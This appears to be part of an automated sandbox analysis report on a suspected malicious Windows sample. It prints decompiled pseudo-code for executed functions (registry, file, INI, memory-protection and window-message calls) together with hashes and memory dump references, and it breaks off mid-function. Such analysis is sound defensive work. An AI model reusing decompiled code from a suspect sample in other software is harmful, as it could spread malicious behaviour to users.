API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 49d6d45c19fd9ce16cf5ead741ce7865cab5f80dad940e6fa601af85f2b4f0df
Instruction ID: e290aa7e8e2d3d31293d3dea9f9026cca2474129c302046706435e2c0a3478f8
Opcode Fuzzy Hash: 49d6d45c19fd9ce16cf5ead741ce7865cab5f80dad940e6fa601af85f2b4f0df
Instruction Fuzzy Hash: 804173B2500204FFDB259F65EDC6B5E37F4FB44356F308425E809C7121DA39AB829B95

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5935 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7784699b659131f70fa0e7e842f773b6092e6ab96a0144425c64b7ee47b8d69
Instruction ID: 15e86b6ec0a5d6526b107046fb76d09933c6b809c78137c37efe24b498e3c621
Opcode Fuzzy Hash: d7784699b659131f70fa0e7e842f773b6092e6ab96a0144425c64b7ee47b8d69
Instruction Fuzzy Hash: 75413A70A08347DFDF346E7899A53DA3BA2AF263A0F90417EDC4A9B145DB3585468B01

Uniqueness

Uniqueness Score: -1.00%

Function 02AD30F0 Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f20b3d388287464f711dc990e50ab6dbf9ab0854c29475c836f70bfdc7537346
Instruction ID: e0df1b7d0b3e3c5ff1ff78e76fe8cbfc570e337325295920ad4b438a9f9dde0e
Opcode Fuzzy Hash: f20b3d388287464f711dc990e50ab6dbf9ab0854c29475c836f70bfdc7537346
Instruction Fuzzy Hash: AE110874B00357EFDF306E6C99E97DA27929F25390F80407AAC499B204DB3589458B41

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 70B22A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x70b25048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x70b2505c, 4, 0x40, 0x70b2504c); // executed
					 *0x70b2505c = 0xc2;
					 *0x70b2504c = 0;
					 *0x70b25054 = 0;
					 *0x70b25068 = 0;
					 *0x70b25058 = 0;
					 *0x70b25050 = 0;
					 *0x70b25060 = 0;
					 *0x70b2505e = 0;
				}
				return 1;
			}

0x70b22a88
0x70b22a8d
0x70b22a9d
0x70b22aa5
0x70b22aac
0x70b22ab1
0x70b22ab6
0x70b22abb
0x70b22ac0
0x70b22ac5
0x70b22aca
0x70b22aca
0x70b22ad2

APIs

VirtualProtect.KERNELBASE(70B2505C,00000004,00000040,70B2504C), ref: 70B22A9D

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1738d012920e6012ec86f9ca786a62c21b23a44557d72f2be3407a63ad40e95f
Instruction ID: 06c3bf5761181e32eeb64575190c8f705bc4d95d62f31e0a95ca5cee6e166148
Opcode Fuzzy Hash: 1738d012920e6012ec86f9ca786a62c21b23a44557d72f2be3407a63ad40e95f
Instruction Fuzzy Hash: 19F0A5B2520280DEC370CF2A8CC4B0B3FE0B709315B24452AE18CD7262EB745646CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063b4
0x004063bb
0x004063ce
0x00000000
0x004063ce
0x004063bf
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 65c2aa993e69b1b7995987e9dece7a59c9f58c0f53bfe85ea67610976eabe651
Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
Opcode Fuzzy Hash: 65c2aa993e69b1b7995987e9dece7a59c9f58c0f53bfe85ea67610976eabe651
Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x10418
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(00010418,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040498A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x6bdacc
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x436000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
